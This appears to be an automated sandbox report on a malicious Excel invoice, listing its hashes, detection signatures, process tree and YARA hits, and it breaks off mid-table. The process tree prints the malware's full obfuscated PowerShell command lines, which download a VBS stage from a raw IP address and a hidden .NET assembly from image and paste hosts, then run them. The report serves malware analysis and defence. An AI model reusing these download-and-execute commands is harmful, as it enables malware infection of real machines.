Edit tour

Windows Analysis Report
Invoice A037.xls

Overview

General Information

Sample name:	Invoice A037.xls
Analysis ID:	1572970
MD5:	78c7227d02510326cd88eb38003b252e
SHA1:	742a16e734f3e3ede2f8acdbc89aef3962c4f338
SHA256:	41cf481a165a9e4c70bcd9170b283912783b18e5b8af8a21e76cb0f175d167c9
Tags:	xlsuser-abuse_ch
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Powershell download and execute

Yara detected VBS Downloader Generic

Yara detected obfuscated html page

Connects to a pastebin service (likely for C&C)

Document exploit detected (process start blacklist hit)

Excel sheet contains many unusual embedded objects

Installs new ROOT certificates

Machine Learning detection for sample

Microsoft Office drops suspicious files

PowerShell case anomaly found

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: File With Uncommon Extension Created By An Office Application

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious Microsoft Office Child Process

Sigma detected: WScript or CScript Dropper

Suspicious command line found

Suspicious execution chain found

Suspicious powershell command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript starts Powershell (via cmd or directly)

Compiles C# or VB.Net code

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Document contains embedded VBA macros

Document embeds suspicious OLE2 link

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Excel Network Connections

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Script Initiated Connection

Sigma detected: Suspicious Office Outbound Connections

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 3220 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

mshta.exe (PID: 3516 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)

cmd.exe (PID: 3664 cmdline: "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

powershell.exe (PID: 3688 cmdline: PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)

csc.exe (PID: 3928 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)

cvtres.exe (PID: 3936 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD3B4.tmp" "c:\Users\user\AppData\Local\Temp\oojbmfem\CSCF5327E7FE341DA9559637718172BC.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

wscript.exe (PID: 4028 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS" MD5: 045451FA238A75305CC26AC982472367)

powershell.exe (PID: 2580 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel MD5: A575A7610E5F003CC36DF39E07C4BA7D)

AcroRd32.exe (PID: 3752 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding MD5: 2F8D93826B8CBF9290BC57535C7A6817)

RdrCEF.exe (PID: 1324 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043 MD5: 326A645391A97C760B60C558A35BB068)

mshta.exe (PID: 2556 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)

cmd.exe (PID: 3588 cmdline: "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

powershell.exe (PID: 3580 cmdline: PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)

csc.exe (PID: 1120 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\otto1awr\otto1awr.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)

cvtres.exe (PID: 544 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES254C.tmp" "c:\Users\user\AppData\Local\Temp\otto1awr\CSCDFB69145189A40B197F122BC8548BE9C.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

wscript.exe (PID: 3696 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS" MD5: 045451FA238A75305CC26AC982472367)

powershell.exe (PID: 3912 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel MD5: A575A7610E5F003CC36DF39E07C4BA7D)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS	JoeSecurity_VBS_Downloader_Generic	Yara detected VBS Downloader Generic	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith[1].tiff	JoeSecurity_VBS_Downloader_Generic	Yara detected VBS Downloader Generic	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicewithgreatfeaturesreturnformebestthingsgivensoofar[1].hta	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: powershell.exe PID: 2580	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 2580	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x14297:$b2: ::FromBase64String( 0x14d81:$b2: ::FromBase64String( 0x306cb:$b2: ::FromBase64String( 0x5fd56:$b2: ::FromBase64String( 0x606c8:$b2: ::FromBase64String( 0x61ace:$b2: ::FromBase64String( 0x69ad0:$b2: ::FromBase64String( 0x71d6b:$b2: ::FromBase64String( 0x8f2dc:$b2: ::FromBase64String( 0x8f343:$b2: ::FromBase64String( 0x913f7:$b2: ::FromBase64String( 0x926af:$b2: ::FromBase64String( 0x14276:$b3: ::UTF8.GetString( 0x14d60:$b3: ::UTF8.GetString( 0x306aa:$b3: ::UTF8.GetString( 0x5fd35:$b3: ::UTF8.GetString( 0x606a7:$b3: ::UTF8.GetString( 0x61aad:$b3: ::UTF8.GetString( 0x69aaf:$b3: ::UTF8.GetString( 0x71ba0:$b3: ::UTF8.GetString( 0x8f322:$b3: ::UTF8.GetString(
Process Memory Space: powershell.exe PID: 3912	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 3912	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x16c2:$b2: ::FromBase64String( 0x2036:$b2: ::FromBase64String( 0x1ce67:$b2: ::FromBase64String( 0x1d7d9:$b2: ::FromBase64String( 0x261b2:$b2: ::FromBase64String( 0x325f9:$b2: ::FromBase64String( 0x33106:$b2: ::FromBase64String( 0x33a86:$b2: ::FromBase64String( 0x3de9d:$b2: ::FromBase64String( 0x66cff:$b2: ::FromBase64String( 0x66d67:$b2: ::FromBase64String( 0x6859a:$b2: ::FromBase64String( 0x68f0d:$b2: ::FromBase64String( 0x16a1:$b3: ::UTF8.GetString( 0x2015:$b3: 